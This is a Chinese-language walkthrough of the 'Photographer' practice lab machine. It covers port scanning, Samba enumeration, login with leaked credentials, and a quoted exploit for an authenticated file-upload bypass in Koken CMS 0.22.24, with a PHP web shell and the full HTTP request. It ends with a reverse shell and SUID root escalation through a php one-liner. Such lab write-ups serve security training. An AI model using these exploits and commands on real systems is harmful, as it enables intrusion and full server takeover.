LOGO OA教程 ERP教程 模切知识交流 PMS教程 CRM教程 开发文档 其他文档  
 
网站管理员

【Web渗透】 Photographer靶机

admin
2023年12月13日 18:57 本文热度 568

kali:192.168.111.111

靶机:192.168.111.132

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.132

目标8000端口为koken cms

使用enum4linux枚举目标samba服务,发现共享文件夹

enum4linux -a 192.168.111.132

连接目标共享文件夹,发现两个文件

smbclient -N \\\\192.168.111.132\\sambashare

mailsent.txt文件内容

使用daisa@photographer.com | babygirl,登录koken后台

同时该版本的koken cms存在文件上传漏洞

searchsploit koken

# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated)# Date: 2020-07-15# Exploit Author: v1n1v131r4# Vendor Homepage: http://koken.me/# Software Link: https://www.softaculous.com/apps/cms/Koken# Version: 0.22.24# Tested on: Linux# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.mdThe Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp.Steps to exploit:1. create a malicious PHP file with this content:   <?php system($_GET['cmd']);?>2. Save as "image.php.jpg"3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp.4. On Burp, rename your file to "image.php"POST /koken/api.php?/content HTTP/1.1Host: target.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://target.com/koken/admin/x-koken-auth: cookieContent-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551Content-Length: 1043Connection: closeCookie: PHPSESSID= [Cookie value here]-----------------------------2391361183188899229525551Content-Disposition: form-data; name="name"image.php-----------------------------2391361183188899229525551Content-Disposition: form-data; name="chunk"0-----------------------------2391361183188899229525551Content-Disposition: form-data; name="chunks"1-----------------------------2391361183188899229525551Content-Disposition: form-data; name="upload_session_start"1594831856-----------------------------2391361183188899229525551Content-Disposition: form-data; name="visibility"public-----------------------------2391361183188899229525551Content-Disposition: form-data; name="license"all-----------------------------2391361183188899229525551Content-Disposition: form-data; name="max_download"none-----------------------------2391361183188899229525551Content-Disposition: form-data; name="file"; filename="image.php"Content-Type: image/jpeg<?php system($_GET['cmd']);?>-----------------------------2391361183188899229525551--5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server.

漏洞利用

利用burp抓包,修改上传文件的后缀,jpg改为php即可上传

访问http://192.168.111.132:8000/storage/originals/cb/43/php-reverse-shell.php获得反弹shell

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

提权方法:https://gtfobins.github.io/gtfobins/php/#suid

提升为root

php -r "pcntl_exec('/bin/sh', ['-p']);"

flag


该文章在 2023/12/13 18:58:44 编辑过
关键字查询
相关文章
正在查询...
点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。
点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理,结合码头的业务特点,围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体,是物流码头及其他港口类企业的高效ERP管理信息系统。
点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。
点晴免费OA是一款软件和通用服务都免费,不限功能、不限时间、不限用户的免费OA协同办公管理系统。
Copyright 2010-2024 ClickSun All Rights Reserved